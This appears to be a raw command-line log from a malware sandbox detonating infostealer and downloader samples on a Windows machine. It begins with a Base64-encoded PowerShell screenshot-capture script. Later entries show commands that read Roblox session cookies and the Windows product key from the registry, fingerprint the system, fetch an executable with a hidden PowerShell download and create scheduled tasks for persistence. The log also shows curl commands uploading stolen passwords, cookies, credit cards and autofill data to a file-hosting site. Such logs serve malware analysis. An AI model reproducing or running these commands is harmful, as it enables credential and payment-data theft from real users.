JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfbs1blz\xfbs1blz.cmdline"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABD2.tmp" "c:\Users\Admin\AppData\Local\Temp\xfbs1blz\CSC6F1275C1466A4B1FB51355725463AB7.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Hg7K3.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Hg7K3.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfb63cc40,0x7ffdfb63cc4c,0x7ffdfb63cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1740,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1720 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2096,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2156,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3064 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3492,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4384 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4660 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4288,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3024,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4724 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3576,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3064,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4700,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4944,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:1
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7288FB02CAA8AFED10124D7D86A0F655
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5024,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSIF7A1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240842921 2 CustomActions!CustomActions.CustomActions.StartApp
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe"
C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe
"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Windows\Installer\MSIFB6B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240843640 8 CustomActions!CustomActions.CustomActions.InstallPing
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=2272,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4308 /prefetch:1
C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe
"C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3500,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2236 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3496,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4404 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\archive.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffdfae03cb8,0x7ffdfae03cc8,0x7ffdfae03cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4232,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5192 /prefetch:8
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 820720ED358ACB2F23030A0E73AE6B55 C
C:\Users\Admin\AppData\Local\Temp\shost.exe
shost.exe
C:\Users\Admin\AppData\Local\Temp\shost.exe
shost.exe
C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe
"C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
C:\Windows\system32\taskkill.exe
taskkill /im firefox.exe /t /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
